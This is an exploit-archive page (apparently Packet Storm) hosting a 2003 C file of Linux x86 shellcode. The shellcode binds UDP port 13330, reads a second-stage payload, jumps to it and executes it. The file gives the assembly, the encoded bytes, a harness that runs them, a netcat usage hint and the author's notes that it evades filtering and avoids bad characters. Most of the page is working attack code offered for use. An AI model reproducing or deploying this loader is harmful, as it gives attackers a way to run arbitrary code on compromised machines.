exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

linux86-udpcode.c

linux86-udpcode.c
Posted Jun 29, 2003
Authored by Gunzip | Site members.xoom.it

Linux x86 UDP shellcode. Reads from UDP port 13330 to retrieve other shellcode then executes it.

tags | x86, udp, shellcode
systems | linux
SHA-256 | a19f2e0f5e3ed7c024fa5903d3b63b3001cc6d694f0a752097064021a0cea265

linux86-udpcode.c

Change Mirror Download
/**
** Linux/x86 udp + read + exec shellcode (c) gunzip
**
** reads from udp port 13330 another shellcode then executes it
**
** 1. Udp is usually not filtered
** 2. You can send very big shellcode (size <= 65535)
** 3. It's shorter than any tcp bind-shellcode (just 60 bytes)
** 4. Your sent shellcodes can contain any char ( 0x00 too )
** 5 You can send a whole shell script to execute with a command code
** 6. Does not contain CR, LF, spaces, slashes and so on
** 7. No need to search for file descriptors
**
** gunzip@ircnet <techieone@softhome.net>
** http://members.xoom.it/gunzip
**
** If you can't figure it out how to use this you don't need this..
** hint: try with puts( shellcode ) and pipe netcat -u host
**
** HaPPy BiRtHdAy tankie !!! :-]
**
**/

void udp_exec()
{
__asm__("
/* fd = socket( AF_INET, SOCK_DGRAM, 0 ) */

xorl %eax, %eax
xorl %ebx, %ebx
incl %ebx # socket()
pushl %eax # IPPROTO_IP
pushl $0x2 # SOCK_DGRAM
pushl $0x2 # AF_INET
movl %esp, %ecx
movb $0x66, %al # SYS_socketcall
int $0x80

/* bind(s, (struct sockaddr *)&sa, sizeof(sa)) */

decl %ebx # ebx = 0x0
pushl %ebx # PAD
pushl %ebx # PAD
pushl %ebx # INADDR_ANY
pushw $0x1234 # PORT (13330)
pushw $0x2 # ADDRESS FAMILY
movl %esp, %ecx
pushl $0x16 # sizeof(struct sockaddr)
pushl %ecx # pointer to struct sockaddr
pushl %eax # socket file descriptor
movl %esp, %ecx # SYS_socketcall * args
movb $0x2, %bl # SYS_socketcall bind()

push $0x66 # SYS_socketcall
popl %eax
int $0x80

/* read( s, buf, 0xffff ); jmp *buf */

movl (%esp), %ebx # socket fd
cltd # on bind success eax = 0x0
movw $0xffff,%dx # len = 65535
subl %edx, %esp # reserves space
movl %esp, %ecx # where to read
movb $0x03, %al # SYS_read
int $0x80
jmp *%ecx
");
}

#define PORT "\x34\x12"

char shellcode[]=
"\x31\xc0\x31\xdb\x43\x50\x6a\x02\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x4b\x53\x53\x53\x66\x68" PORT "\x66\x6a\x02\x89\xe1\x6a\x16\x51"
"\x50\x89\xe1\xb3\x02\x6a\x66\x58\xcd\x80\x8b\x1c\x24\x99\x66\xba"
"\xff\xff\x29\xd4\x89\xe1\xb0\x03\xcd\x80\xff\xe1";

main()
{
void (*f)() = (void *)&shellcode;
printf("\n[+] Udp read shellcode by gunzip, len = %d\n", strlen(shellcode));
f();
}
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close